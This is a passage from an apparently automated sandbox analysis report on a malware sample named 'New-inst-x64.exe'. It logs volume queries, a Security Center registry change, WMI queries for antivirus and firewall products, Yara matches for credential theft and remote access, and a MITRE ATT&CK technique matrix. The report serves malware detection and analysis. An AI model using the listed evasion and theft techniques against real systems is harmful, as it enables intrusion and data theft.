      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0045E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,28_2_0045E6D7

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
      Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'

      Stealing of Sensitive Information

      Source: Yara match File source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match File source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 111 Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Disable or Modify Tools | LSASS Memory | 251 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 41 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 111 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | 34 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
      [Behavior graph. ID: 1637051, Sample: New-inst-x64.exe, Startdate: 13/03/2025, Architecture: WINDOWS, Score: 100]
